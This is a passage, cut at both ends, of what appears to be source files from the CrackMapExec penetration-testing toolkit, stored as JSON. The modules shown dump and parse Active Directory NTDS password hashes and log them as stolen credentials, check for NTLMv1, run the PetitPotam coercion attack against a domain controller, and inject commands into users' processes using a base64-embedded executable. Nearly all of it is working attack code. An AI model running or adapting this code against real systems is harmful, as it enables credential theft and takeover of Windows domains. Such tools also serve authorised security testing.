ntdsutil.exe to %s%s\" % (self.tmp_dir, self.dump_location))\n context.log.highlight(\"Dumping the NTDS, this could take a while so go grab a redbull...\")\n context.log.debug(\"Executing command {}\".format(command))\n p = connection.execute(command, True)\n context.log.debug(p)\n if \"success\" in p:\n context.log.success(\"NTDS.dit dumped to %s%s\" % (self.tmp_dir, self.dump_location))\n else:\n context.log.fail(\"Error while dumping NTDS\")\n return\n\n os.makedirs(self.dir_result, exist_ok=True)\n os.makedirs(os.path.join(self.dir_result, \"Active Directory\"), exist_ok=True)\n os.makedirs(os.path.join(self.dir_result, \"registry\"), exist_ok=True)\n\n context.log.display(\"Copying NTDS dump to %s\" % self.dir_result)\n context.log.debug(\"Copy ntds.dit to host\")\n with open(os.path.join(self.dir_result, \"Active Directory\", \"ntds.dit\"), \"wb+\") as dump_file:\n try:\n connection.conn.getFile(\n self.share,\n self.tmp_share + self.dump_location + \"\\\\\" + \"Active Directory\\\\ntds.dit\",\n dump_file.write,\n )\n context.log.debug(\"Copied ntds.dit file\")\n except Exception as e:\n context.log.fail(\"Error while get ntds.dit file: {}\".format(e))\n\n context.log.debug(\"Copy SYSTEM to host\")\n with open(os.path.join(self.dir_result, \"registry\", \"SYSTEM\"), \"wb+\") as dump_file:\n try:\n connection.conn.getFile(\n self.share,\n self.tmp_share + self.dump_location + \"\\\\\" + \"registry\\\\SYSTEM\",\n dump_file.write,\n )\n context.log.debug(\"Copied SYSTEM file\")\n except Exception as e:\n context.log.fail(\"Error while get SYSTEM file: {}\".format(e))\n\n context.log.debug(\"Copy SECURITY to host\")\n with open(os.path.join(self.dir_result, \"registry\", \"SECURITY\"), \"wb+\") as dump_file:\n try:\n connection.conn.getFile(\n self.share,\n self.tmp_share + self.dump_location + \"\\\\\" + \"registry\\\\SECURITY\",\n dump_file.write,\n )\n context.log.debug(\"Copied SECURITY file\")\n except Exception as e:\n context.log.fail(\"Error while get SECURITY file: {}\".format(e))\n context.log.display(\"NTDS dump copied to %s\" % self.dir_result)\n try:\n command = \"rmdir /s /q %s%s\" % (self.tmp_dir, self.dump_location)\n p = connection.execute(command, True)\n context.log.success(\"Deleted %s%s remote dump directory\" % (self.tmp_dir, self.dump_location))\n except Exception as e:\n context.log.fail(\"Error deleting {} remote directory on share {}: {}\".format(self.dump_location, self.share, e))\n\n localOperations = LocalOperations(\"%s/registry/SYSTEM\" % self.dir_result)\n bootKey = localOperations.getBootKey()\n noLMHash = localOperations.checkNoLMHashPolicy()\n\n host_id = context.db.get_hosts(filter_term=connection.host)[0][0]\n\n def add_ntds_hash(ntds_hash, host_id):\n add_ntds_hash.ntds_hashes += 1\n if context.enabled:\n if \"Enabled\" in ntds_hash:\n ntds_hash = ntds_hash.split(\" \")[0]\n context.log.highlight(ntds_hash)\n else:\n ntds_hash = ntds_hash.split(\" \")[0]\n context.log.highlight(ntds_hash)\n if ntds_hash.find(\"$\") == -1:\n if ntds_hash.find(\"\\\\\") != -1:\n domain, hash = ntds_hash.split(\"\\\\\")\n else:\n domain = connection.domain\n hash = ntds_hash\n\n try:\n username, _, lmhash, nthash, _, _, _ = hash.split(\":\")\n parsed_hash = \":\".join((lmhash, nthash))\n if validate_ntlm(parsed_hash):\n context.db.add_credential(\"hash\", domain, username, parsed_hash, pillaged_from=host_id)\n add_ntds_hash.added_to_db += 1\n return\n raise\n except:\n context.log.debug(\"Dumped hash is not NTLM, not adding to db for now ;)\")\n else:\n context.log.debug(\"Dumped hash is a computer account, not adding to db\")\n\n add_ntds_hash.ntds_hashes = 0\n add_ntds_hash.added_to_db = 0\n\n NTDS = NTDSHashes(\n \"%s/Active Directory/ntds.dit\" % self.dir_result,\n bootKey,\n isRemote=False,\n history=False,\n noLMHash=noLMHash,\n remoteOps=None,\n useVSSMethod=True,\n justNTLM=True,\n pwdLastSet=False,\n resumeSession=None,\n outputFileName=connection.output_filename,\n justUser=None,\n printUserStatus=True,\n perSecretCallback=lambda secretType, secret: add_ntds_hash(secret, host_id),\n )\n\n try:\n context.log.success(\"Dumping the NTDS, this could take a while so go grab a redbull...\")\n NTDS.dump()\n context.log.success(\n \"Dumped {} NTDS hashes to {} of which {} were added to the database\".format(\n highlight(add_ntds_hash.ntds_hashes),\n connection.output_filename + \".ntds\",\n highlight(add_ntds_hash.added_to_db),\n )\n )\n context.log.display(\"To extract only enabled accounts from the output file, run the following command: \")\n context.log.display(\"grep -iv disabled {} | cut -d ':' -f1\".format(connection.output_filename + \".ntds\"))\n except Exception as e:\n context.log.fail(e)\n\n NTDS.finish()\n\n if self.no_delete:\n context.log.display(\"Raw NTDS dump copied to %s, parse it with:\" % self.dir_result)\n context.log.display('secretsdump.py -system %s/registry/SYSTEM -security %s/registry/SECURITY -ntds \"%s/Active Directory/ntds.dit\" LOCAL' % (self.dir_result, self.dir_result, self.dir_result))\n else:\n shutil.rmtree(self.dir_result)\n" }, { "path": "cme/modules/ntlmv1.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples.secretsdump import RemoteOperations\nfrom impacket.dcerpc.v5.rrp import DCERPCSessionError\n\n\nclass CMEModule:\n \"\"\"\n Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication\n Module by @Tw1sm\n \"\"\"\n\n name = \"ntlmv1\"\n description = \"Detect if lmcompatibilitylevel on the target is set to 0 or 1\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n self.output = \"NTLMv1 allowed on: {} - LmCompatibilityLevel = {}\"\n\n def on_admin_login(self, context, connection):\n try:\n remote_ops = RemoteOperations(connection.conn, False)\n remote_ops.enableRegistry()\n\n if remote_ops._RemoteOperations__rrp:\n ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)\n reg_handle = ans[\"phKey\"]\n ans = rrp.hBaseRegOpenKey(\n remote_ops._RemoteOperations__rrp,\n reg_handle,\n \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\",\n )\n key_handle = ans[\"phkResult\"]\n rtype = None\n data = None\n try:\n rtype, data = rrp.hBaseRegQueryValue(\n remote_ops._RemoteOperations__rrp,\n key_handle,\n \"lmcompatibilitylevel\\x00\",\n )\n except rrp.DCERPCSessionError as e:\n context.log.debug(f\"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set\")\n\n if rtype and data and int(data) in [0, 1, 2]:\n context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data))\n except DCERPCSessionError as e:\n context.log.debug(f\"Error connecting to RemoteRegistry: {e}\")\n finally:\n remote_ops.finish()\n" }, { "path": "cme/modules/petitpotam.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# From https://github.com/topotam/PetitPotam\n# All credit to @topotam\n# Module by @mpgn_x64\n\nimport sys\n\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT\nfrom impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD, PCHAR, RPC_SID, LPWSTR\nfrom impacket.dcerpc.v5.rpcrt import (\n DCERPCException,\n RPC_C_AUTHN_WINNT,\n RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\n RPC_C_AUTHN_GSS_NEGOTIATE,\n)\nfrom impacket.uuid import uuidtup_to_bin\n\n\nclass CMEModule:\n name = \"petitpotam\"\n description = \"Module to check if the DC is vulnerable to PetitPotam, credit to @topotam\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n LISTENER IP of your listener\n PIPE Default PIPE (default: lsarpc)\n \"\"\"\n self.listener = \"127.0.0.1\"\n if \"LISTENER\" in module_options:\n self.listener = module_options[\"LISTENER\"]\n self.pipe = \"lsarpc\"\n if \"PIPE\" in module_options:\n self.pipe = module_options[\"PIPE\"]\n\n def on_login(self, context, connection):\n dce = coerce(\n connection.username,\n password=connection.password,\n domain=connection.domain,\n lmhash=connection.lmhash,\n nthash=connection.nthash,\n aesKey=connection.aesKey,\n target=connection.host if not connection.kerberos else connection.hostname + \".\" + connection.domain,\n pipe=self.pipe,\n do_kerberos=connection.kerberos,\n dc_host=connection.kdcHost,\n target_ip=connection.host,\n context=context,\n )\n if efs_rpc_open_file_raw(dce, self.listener, context):\n context.log.highlight(\"VULNERABLE\")\n context.log.highlight(\"Next step: https://github.com/topotam/PetitPotam\")\n try:\n host = context.db.get_hosts(connection.host)[0]\n context.db.add_host(\n host.ip,\n host.hostname,\n host.domain,\n host.os,\n host.smbv1,\n host.signing,\n petitpotam=True,\n )\n except Exception as e:\n context.log.debug(f\"Error updating petitpotam status in database\")\n\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__(self):\n key = self.error_code\n if key in system_errors.ERROR_MESSAGES:\n error_msg_short = system_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]\n return \"EFSR SessionError: code: 0x%x - %s - %s\" % (\n self.error_code,\n error_msg_short,\n error_msg_verbose,\n )\n else:\n return \"EFSR SessionError: unknown error code: 0x%x\" % self.error_code\n\n\n################################################################################\n# STRUCTURES\n################################################################################\nclass EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):\n align = 1\n structure = ((\"Data\", \"20s\"),)\n\n\nclass EFS_EXIM_PIPE(NDRSTRUCT):\n align = 1\n structure = ((\"Data\", \":\"),)\n\n\nclass EFS_HASH_BLOB(NDRSTRUCT):\n structure = (\n (\"Data\", DWORD),\n (\"cbData\", PCHAR),\n )\n\n\nclass EFS_RPC_BLOB(NDRSTRUCT):\n structure = (\n (\"Data\", DWORD),\n (\"cbData\", PCHAR),\n )\n\n\nclass EFS_CERTIFICATE_BLOB(NDRSTRUCT):\n structure = (\n (\"Type\", DWORD),\n (\"Data\", DWORD),\n (\"cbData\", PCHAR),\n )\n\n\nclass ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):\n structure = (\n (\"Lenght\", DWORD),\n (\"SID\", RPC_SID),\n (\"Hash\", EFS_HASH_BLOB),\n (\"Display\", LPWSTR),\n )\n\n\nclass ENCRYPTION_CERTIFICATE(NDRSTRUCT):\n structure = (\n (\"Lenght\", DWORD),\n (\"SID\", RPC_SID),\n (\"Hash\", EFS_CERTIFICATE_BLOB),\n )\n\n\nclass ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):\n align = 1\n structure = (\n (\"Cert\", DWORD),\n (\"Users\", ENCRYPTION_CERTIFICATE_HASH),\n )\n\n\nclass ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):\n structure = (\n (\"Type\", DWORD),\n (\"HASH\", ENCRYPTION_CERTIFICATE_HASH_LIST),\n (\"Certif\", ENCRYPTION_CERTIFICATE),\n (\"Blob\", EFS_RPC_BLOB),\n )\n\n\nclass ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):\n align = 1\n structure = ((\"Data\", \":\"),)\n\n\n################################################################################\n# RPC CALLS\n################################################################################\nclass EfsRpcOpenFileRaw(NDRCALL):\n opnum = 0\n structure = (\n (\"fileName\", WSTR),\n (\"Flag\", ULONG),\n )\n\n\nclass EfsRpcOpenFileRawResponse(NDRCALL):\n structure = (\n (\"hContext\", EXIMPORT_CONTEXT_HANDLE),\n (\"ErrorCode\", ULONG),\n )\n\n\nclass EfsRpcEncryptFileSrv(NDRCALL):\n opnum = 4\n structure = ((\"FileName\", WSTR),)\n\n\nclass EfsRpcEncryptFileSrvResponse(NDRCALL):\n structure = ((\"ErrorCode\", ULONG),)\n\n\ndef coerce(\n username,\n password,\n domain,\n lmhash,\n nthash,\n aesKey,\n target,\n pipe,\n do_kerberos,\n dc_host,\n target_ip=None,\n context=None,\n):\n binding_params = {\n \"lsarpc\": {\n \"stringBinding\": r\"ncacn_np:%s[\\PIPE\\lsarpc]\" % target,\n \"MSRPC_UUID_EFSR\": (\"c681d488-d850-11d0-8c52-00c04fd90f7e\", \"1.0\"),\n },\n \"efsr\": {\n \"stringBinding\": r\"ncacn_np:%s[\\PIPE\\efsrpc]\" % target,\n \"MSRPC_UUID_EFSR\": (\"df1941c5-fe89-4e79-bf10-463657acf44d\", \"1.0\"),\n },\n \"samr\": {\n \"stringBinding\": r\"ncacn_np:%s[\\PIPE\\samr]\" % target,\n \"MSRPC_UUID_EFSR\": (\"c681d488-d850-11d0-8c52-00c04fd90f7e\", \"1.0\"),\n },\n \"lsass\": {\n \"stringBinding\": r\"ncacn_np:%s[\\PIPE\\lsass]\" % target,\n \"MSRPC_UUID_EFSR\": (\"c681d488-d850-11d0-8c52-00c04fd90f7e\", \"1.0\"),\n },\n \"netlogon\": {\n \"stringBinding\": r\"ncacn_np:%s[\\PIPE\\netlogon]\" % target,\n \"MSRPC_UUID_EFSR\": (\"c681d488-d850-11d0-8c52-00c04fd90f7e\", \"1.0\"),\n },\n }\n rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe][\"stringBinding\"])\n if hasattr(rpc_transport, \"set_credentials\"):\n rpc_transport.set_credentials(\n username=username,\n password=password,\n domain=domain,\n lmhash=lmhash,\n nthash=nthash,\n aesKey=aesKey,\n )\n\n if target_ip:\n rpc_transport.setRemoteHost(target_ip)\n\n dce = rpc_transport.get_dce_rpc()\n dce.set_auth_type(RPC_C_AUTHN_WINNT)\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n\n if do_kerberos:\n rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n\n context.log.info(\"[-] Connecting to %s\" % binding_params[pipe][\"stringBinding\"])\n try:\n dce.connect()\n except Exception as e:\n context.log.debug(\"Something went wrong, check error status => %s\" % str(e))\n sys.exit()\n context.log.info(\"[+] Connected!\")\n context.log.info(\"[+] Binding to %s\" % binding_params[pipe][\"MSRPC_UUID_EFSR\"][0])\n try:\n dce.bind(uuidtup_to_bin(binding_params[pipe][\"MSRPC_UUID_EFSR\"]))\n except Exception as e:\n context.log.debug(\"Something went wrong, check error status => %s\" % str(e))\n sys.exit()\n context.log.info(\"[+] Successfully bound!\")\n return dce\n\n\ndef efs_rpc_open_file_raw(dce, listener, context=None):\n try:\n request = EfsRpcOpenFileRaw()\n request[\"fileName\"] = \"\\\\\\\\%s\\\\test\\\\Settings.ini\\x00\" % listener\n request[\"Flag\"] = 0\n resp = dce.request(request)\n\n except Exception as e:\n if str(e).find(\"ERROR_BAD_NETPATH\") >= 0:\n context.log.info(\"[+] Got expected ERROR_BAD_NETPATH exception!!\")\n context.log.info(\"[+] Attack worked!\")\n return True\n if str(e).find(\"rpc_s_access_denied\") >= 0:\n context.log.info(\"[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!\")\n context.log.info(\"[+] OK! Using unpatched function!\")\n context.log.info(\"[-] Sending EfsRpcEncryptFileSrv!\")\n try:\n request = EfsRpcEncryptFileSrv()\n request[\"FileName\"] = \"\\\\\\\\%s\\\\test\\\\Settings.ini\\x00\" % listener\n resp = dce.request(request)\n except Exception as e:\n if str(e).find(\"ERROR_BAD_NETPATH\") >= 0:\n context.log.info(\"[+] Got expected ERROR_BAD_NETPATH exception!!\")\n context.log.info(\"[+] Attack worked!\")\n return True\n else:\n context.log.debug(\"Something went wrong, check error status => %s\" % str(e))\n else:\n context.log.debug(\"Something went wrong, check error status => %s\" % str(e))\n" }, { "path": "cme/modules/pi.py", "content": "from base64 import b64decode\nfrom sys import exit\nfrom os import path\n\nclass CMEModule:\n\n name = \"pi\"\n description = \"Run command as logged on users via Process Injection\"\n supported_protocols = [\"smb\"]\n opsec_safe = True \n multiple_hosts = True\n\n def options(self, context, module_options):\n '''\n PID // Process ID for Target User, PID=pid\n EXEC // Command to exec, EXEC='command' Single quote is better to use\n\n This module reads the executed command output under the name C:\\windows\\temp\\output.txt and deletes it. In case of a possible error, it may need to be deleted manually.\n '''\n\n self.tmp_dir = \"C:\\\\Windows\\\\Temp\\\\\"\n self.share = \"C$\"\n self.tmp_share = self.tmp_dir.split(\":\")[1]\n self.pi = \"pi.exe\"\n self.useembeded = True\n self.pid = self.cmd = \"\"\n self.pi_embedded = b64decode('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